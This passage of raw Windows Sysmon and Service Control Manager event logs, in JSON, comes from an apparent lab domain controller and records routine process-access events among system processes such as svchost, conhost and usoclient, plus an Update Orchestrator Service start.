07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3954,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3955,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3956,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.935\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-0010EAE70500}\r\nTargetProcessId: 2224\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.935","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-0010EAE70500}","TargetProcessId":"2224","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3957,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.935\r\nSourceProcessGUID: {41C8662E-2017-5F25-0000-0010F1E60500}\r\nSourceProcessId: 4896\r\nSourceThreadId: 4944\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-00108FE50500}\r\nTargetProcessId: 616\r\nTargetImage: C:\\Windows\\System32\\sihclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.935","SourceProcessGUID":"{41C8662E-2017-5F25-0000-0010F1E60500}","SourceProcessId":"4896","SourceThreadId":"4944","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-00108FE50500}","TargetProcessId":"616","TargetImage":"C:\\Windows\\System32\\sihclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3958,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.935\r\nSourceProcessGUID: {41C8662E-2017-5F25-0000-0010EAE70500}\r\nSourceProcessId: 2224\r\nSourceThreadId: 2740\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-0010F6E60500}\r\nTargetProcessId: 924\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.935","SourceProcessGUID":"{41C8662E-2017-5F25-0000-0010EAE70500}","SourceProcessId":"2224","SourceThreadId":"2740","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-0010F6E60500}","TargetProcessId":"924","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3959,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.935\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-0010F6E60500}\r\nTargetProcessId: 924\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.935","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-0010F6E60500}","TargetProcessId":"924","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76859,"ProcessID":856,"ThreadID":948,"Channel":"System","Message":"The Update Orchestrator Service for Windows Update service entered the running state.","param1":"Update Orchestrator Service for Windows Update","param2":"running","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3960,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.013\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nSourceProcessId: 1140\r\nSourceThreadId: 1976\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-0010F6E60500}\r\nTargetProcessId: 924\r\nTargetImage: C:\\Windows\\system32\\usoclient.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\usocore.dll+21062|c:\\windows\\system32\\usocore.dll+158b4|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.013","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1976","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-0010F6E60500}","TargetProcessId":"924","TargetImage":"C:\\Windows\\system32\\usoclient.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\usocore.dll+21062|c:\\windows\\system32\\usocore.dll+158b4|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3961,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.060\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:08.060","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+6d83|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3962,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:08.060\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 